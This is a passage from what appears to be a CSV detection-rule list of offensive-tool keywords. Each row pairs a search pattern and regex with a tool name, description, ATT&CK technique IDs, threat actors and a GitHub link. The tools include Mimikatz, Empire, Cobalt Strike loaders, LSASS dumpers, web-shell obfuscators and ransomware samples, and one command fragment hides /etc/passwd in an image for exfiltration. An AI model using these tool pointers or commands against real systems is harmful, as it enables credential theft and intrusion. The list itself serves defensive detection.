Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1102","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","43129" "*Enable-SeDebugPrivilege*",".{0,1000}Enable\-SeDebugPrivilege.{0,1000}","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 function name","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY 
BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","1","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","43130" "*encdatavault2john.py*",".{0,1000}encdatavault2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","43136" "*encfs2john.py*",".{0,1000}encfs2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","43137" "*encode baseImage.jpg /etc/passwd newImage.jpg*",".{0,1000}encode\sbaseImage\.jpg\s\/etc\/passwd\snewImage\.jpg.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","#linux","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","43138" "*encode_base64(xor_encrypt(""cmd /c 
*",".{0,1000}encode_base64\(xor_encrypt\(\""cmd\s\/c\s.{0,1000}","offensive_tool_keyword","ASPJinjaObfuscator","Heavily obfuscated ASP web shell generation tool.","T1100 - T1027","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/fin3ss3g0d/ASPJinjaObfuscator","1","0","N/A","N/A","8","2","160","21","2024-04-26T01:27:42Z","2024-04-23T01:01:53Z","43139" "*encode_base64(xor_encrypt(""WScript.Shell""*",".{0,1000}encode_base64\(xor_encrypt\(\""WScript\.Shell\"".{0,1000}","offensive_tool_keyword","ASPJinjaObfuscator","Heavily obfuscated ASP web shell generation tool.","T1100 - T1027","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/fin3ss3g0d/ASPJinjaObfuscator","1","0","N/A","N/A","8","2","160","21","2024-04-26T01:27:42Z","2024-04-23T01:01:53Z","43140" "*encode_payload rc4 *.txt*",".{0,1000}encode_payload\src4\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","43141" "*encode_xor_shellcode(*",".{0,1000}encode_xor_shellcode\(.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","Black Basta","Defense Evasion","https://github.com/mhaskar/DNSStager","1","0","N/A","N/A","10","7","613","133","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z","43142" "*EncodeGroup/AggressiveProxy*",".{0,1000}EncodeGroup\/AggressiveProxy.{0,1000}","offensive_tool_keyword","cobaltstrike","Project to enumerate proxy configurations and generate shellcode from CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang 
Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EncodeGroup/AggressiveProxy","1","1","N/A","N/A","10","10","141","25","2020-11-04T16:08:11Z","2020-11-04T12:53:00Z","43143" "*EncodeGroup/UAC-SilentClean*",".{0,1000}EncodeGroup\/UAC\-SilentClean.{0,1000}","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE 
STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","N/A","10","10","192","31","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z","43144" "*encodeScriptPolyglot*",".{0,1000}encodeScriptPolyglot.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","43145" "*EncodeShellcode(*",".{0,1000}EncodeShellcode\(.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","0","N/A","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","43146" "*Encryfer-X Ransomware*",".{0,1000}Encryfer\-X\sRansomware.{0,1000}","offensive_tool_keyword","Rust-Malware-Samples","open source ransomware Encryfer in rust","T1486 - T1489 - T1485","TA0040 - TA0043 - TA0042","N/A","N/A","Ransomware","https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/Malware-Samples","1","0","N/A","N/A","10","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","43147" "*encrypt.py *.bin -p * -o *.enc*",".{0,1000}encrypt\.py\s.{0,1000}\.bin\s\-p\s.{0,1000}\s\-o\s.{0,1000}\.enc.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Metro-Holografix/DInjector","1","0","N/A","private github repo","8","","N/A","","","","43148" "*encrypt/encryptFile.go*",".{0,1000}encrypt\/encryptFile\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","Implement load Cobalt Strike & Metasploit&Sliver shellcode with 
golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/zha0gongz1/DesertFox","1","1","N/A","N/A","10","10","125","26","2023-02-02T07:02:12Z","2021-02-04T09:04:13Z","43149" "*encrypt/encryptUrl.go*",".{0,1000}encrypt\/encryptUrl\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - 
T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/zha0gongz1/DesertFox","1","1","N/A","N/A","10","10","125","26","2023-02-02T07:02:12Z","2021-02-04T09:04:13Z","43150" "*Encrypt-Bytes*",".{0,1000}Encrypt\-Bytes.{0,1000}","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1055","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","43151" "*encrypted LSASS dump*",".{0,1000}encrypted\sLSASS\sdump.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","N/A","10","6","510","66","2025-03-28T10:40:27Z","2024-02-02T05:56:29Z","43152" "*encrypted_payload*",".{0,1000}encrypted_payload.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. 
vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","43153" "*encrypted_sleep(ms:*",".{0,1000}encrypted_sleep\(ms\:.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. 
It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#content","N/A","10","3","242","40","2024-06-29T10:34:48Z","2023-10-19T07:54:39Z","43154" "*EncryptedPfx.py*",".{0,1000}EncryptedPfx\.py.{0,1000}","offensive_tool_keyword","ADFSpoof","A python tool to forge AD FS security tokens.","T1550.004 - T1071 - T1606","TA0006 - TA0011 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/mandiant/ADFSpoof","1","0","N/A","N/A","10","4","391","62","2024-08-12T08:13:42Z","2019-03-20T22:30:58Z","43155" "*EncryptedZIP.csproj*",".{0,1000}EncryptedZIP\.csproj.{0,1000}","offensive_tool_keyword","EncryptedZIP","Compresses a directory or file and then encrypts the ZIP file with a supplied key using AES256 CFB. This assembly also clears the key out of memory using RtlZeroMemory","T1564.001 - T1027 - T1214.001","TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/EncryptedZIP","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","43156" "*EncryptedZIP.exe*",".{0,1000}EncryptedZIP\.exe.{0,1000}","offensive_tool_keyword","EncryptedZIP","Compresses a directory or file and then encrypts the ZIP file with a supplied key using AES256 CFB. 
This assembly also clears the key out of memory using RtlZeroMemory","T1564.001 - T1027 - T1214.001","TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/EncryptedZIP","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","43157" "*encrypthub_asseq2QSsxzc*",".{0,1000}encrypthub_asseq2QSsxzc.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","43158" "*Encryption.config values are encrypted with DPAPI, decrypting*",".{0,1000}Encryption\.config\svalues\sare\sencrypted\swith\sDPAPI,\sdecrypting.{0,1000}","offensive_tool_keyword","SecretServerSecretStealer","Powershell script that decrypts the data stored within a Thycotic Secret Server","T1552 - T1027 - T1059","TA0006","N/A","EvilCorp*","Credential Access","https://github.com/denandz/SecretServerSecretStealer","1","0","N/A","N/A","10","1","78","14","2020-08-03T06:52:27Z","2017-04-21T04:06:24Z","43159" "*encryptor -f *.exe -o *.enc*",".{0,1000}encryptor\s\-f\s.{0,1000}\.exe\s\-o\s.{0,1000}\.enc.{0,1000}","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. 
Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","0","N/A","N/A","10","10","1451","235","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z","43160" "*EncryptShellcode(*",".{0,1000}EncryptShellcode\(.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/optiv/ScareCrow","1","0","N/A","N/A","10","10","2805","513","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z","43161" "*Encypor-X-Decryptor*","NA","offensive_tool_keyword","Rust-Malware-Samples","open source ransomware Encryfer in rust","T1486 - T1489 - T1485","TA0040 - TA0043 - TA0042","N/A","N/A","Ransomware","https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/Malware-Samples","1","0","N/A","N/A","10","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","43162" "*endpoint_takeover.exe*",".{0,1000}endpoint_takeover\.exe.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","1","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","43163" "*Endpoint-EE15B860-9EEC-EC11-BB3D-0022482CA4A7.json*",".{0,1000}Endpoint\-EE15B860\-9EEC\-EC11\-BB3D\-0022482CA4A7\.json.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tool","https://github.com/mbrg/power-pwn","1","1","N/A","N/A","10","10","939","100","2025-03-20T08:54:43Z","2022-06-14T11:40:21Z","43164" "*endswith('.dedsec')*",".{0,1000}endswith\(\'\.dedsec\'\).{0,1000}","offensive_tool_keyword","DEDSEC-RANSOMWARE","dedsec ransomware","T1486 - T1489 - T1490 - T1495 - T1488 - T1482","TA0040 - TA0043 - TA0042 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/xelroth/DEDSEC-RANSOMWARE","1","0","N/A","N/A","10","1","7","1","2024-05-17T11:12:23Z","2024-05-17T10:34:03Z","43165" 
"*ENDTHISFILETRANSMISSIONEGRESSASSESS*",".{0,1000}ENDTHISFILETRANSMISSIONEGRESSASSESS.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","43166" "*ENDTHISFILETRANSMISSIONEGRESSASSESS*",".{0,1000}ENDTHISFILETRANSMISSIONEGRESSASSESS.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","43167" "*Enelg52/KittyStager*",".{0,1000}Enelg52\/KittyStager.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","43168" "*Engineer_super.exe*",".{0,1000}Engineer_super\.exe.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","0","N/A","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","43169" "*engineseller/localtonet*",".{0,1000}engineseller\/localtonet.{0,1000}","offensive_tool_keyword","localtonet","LocaltoNet is a reverse proxy that enables you to expose your localhost services to the internet","T1090 - T1102 - T1071 - T1105","TA0010 - TA0011 - TA0009 - TA0003 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/engineseller/localtonet","1","1","N/A","N/A","10","1","6","4","2022-01-31T03:19:25Z","2022-01-31T03:17:18Z","43170" "*engjibo/NetUser*",".{0,1000}engjibo\/NetUser.{0,1000}","offensive_tool_keyword","cobaltstrike","Use windows api to add users which can be used when net is unavailable","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 